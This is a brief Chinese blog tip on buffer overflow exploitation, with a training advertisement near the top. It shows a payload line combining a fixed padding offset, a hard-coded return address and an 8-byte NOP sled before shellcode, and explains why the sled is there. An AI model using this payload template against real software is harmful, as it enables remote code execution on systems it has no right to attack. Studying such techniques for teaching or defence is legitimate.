缓冲区溢出需注意的细节——经验之谈

2019年03月31日 11:50:16 作者:Laowang 阅读数:84669
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:18622800700(手机同微信)。全国诚招招生代理,最低2000元起

在实现缓冲区溢出攻击的时候,发送shellcode时,为了防止shellcode前几个字节被擦除或覆盖,建议构造这样的payload

buffer = "A"*2606+"\xe3\x41\x4b\x5f"+"\x90"*8+shellcode

重点就是所另外加的8个字节的\x90,在汇编指令下为nop,即让计算机空转8个字节,从而有效避免shellcode前几个字节被覆盖或擦除